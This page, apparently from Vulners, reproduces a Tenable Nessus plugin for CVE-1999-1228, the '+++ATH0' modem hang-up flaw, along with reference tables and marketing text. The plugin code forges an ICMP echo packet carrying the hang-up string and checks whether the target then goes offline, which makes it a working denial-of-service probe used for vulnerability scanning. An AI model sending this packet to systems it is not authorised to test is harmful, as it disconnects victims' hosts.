| Reporter | Title | Published | Views | Family All 4 |
|---|---|---|---|---|
| CVE-1999-1228 | 12 Sep 200104:00 | – | cve | |
| CVE-1999-1228 | 12 Sep 200104:00 | – | cvelist | |
| EUVD-1999-1209 | 7 Oct 202500:30 | – | euvd | |
| CVE-1999-1228 | 27 Sep 199804:00 | – | nvd |
| Source | Link |
|---|---|
| seclists | www.seclists.org/bugtraq/1998/Sep/192 |
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(10020);
script_version("1.31");
script_cvs_date("Date: 2019/03/06 18:38:55");
script_cve_id("CVE-1999-1228");
script_name(english:"+ + + ATH0 Modem Hang Up String Remote DoS");
script_summary(english:"Makes a modem hang up");
script_set_attribute(attribute:"synopsis", value:
"The remote modem is affected by a remote command execution
vulnerability.");
script_set_attribute(attribute:"description", value:
"It was possible to disconnect the remote host by sending it an
specially crafted ICMP echo request packet. It is also possible to
make the remote modem hang up and dial any phone number.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1998/Sep/192");
script_set_attribute(attribute:"solution", value:"Add 'ATS2=255' in your modem init string.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"1999/06/21");
script_set_attribute(attribute:"plugin_publication_date", value:"1999/07/29");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_KILL_HOST);
script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.");
script_family(english:"Denial of Service");
script_require_keys("Settings/ParanoidReport");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);
if ( TARGET_IS_IPV6 ) exit(0);
ip = forge_ip_packet(ip_hl:5, ip_v:4, ip_off:0,
ip_id:9, ip_tos:0, ip_p : IPPROTO_ICMP,
ip_len : 20, ip_src : compat::this_host(),
ip_ttl : 255);
data = string("+++ATH0\r\n");
icmp = forge_icmp_packet(ip:ip, icmp_type:8, icmp_code:0,
icmp_seq : 2, icmp_id : 2,
data:data);
start_denial();
reply1 = send_packet(icmp, pcap_active:TRUE);
alive = end_denial();
if(!alive){
security_hole(0);
set_kb_item(name:"Host/dead", value:TRUE);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation